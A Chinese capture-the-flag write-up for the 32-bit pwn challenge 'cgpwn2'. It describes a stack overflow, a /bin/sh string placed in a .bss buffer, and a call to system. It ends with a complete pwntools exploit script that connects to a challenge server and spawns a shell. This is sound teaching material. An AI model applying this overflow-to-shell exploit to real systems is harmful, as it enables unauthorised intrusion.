cgpwn2

file结果如下:

cgpwn2

 

 32位ELF文件

checksec结果如下:

cgpwn2

 

 ida反汇编,main函数如下:

cgpwn2

 

 查看hello函数:

cgpwn2

 

 name位于bss段,位置已知

s存在栈溢出漏洞

发现存在pwn函数,内容如下:

cgpwn2

 

 存在后门函数

所以我们可以在name里输入"/bin/sh",然后调用system函数传入参数name即可

NOTE:32位传参都是从右向左压入栈中,且saved registers和return address都是4个字节

name地址如下:

cgpwn2

 

 system函数地址如下:

cgpwn2

 

 则exp如下:

from pwn import *

#io = process('./pwn')
#io = gdb.debug('./pwn', 'b main')
io = connect('220.249.52.133', 43492)

name_addr = 0x0804A080
system_addr = 0x0804855A

io.sendlineafter('name', '/bin/sh')
payload = b'a' * 0x2a + p32(system_addr)+p32(name_addr)
io.sendlineafter('here:', payload)
io.interactive()

 

上一篇:pwn入门


下一篇:BJD4th pwn pi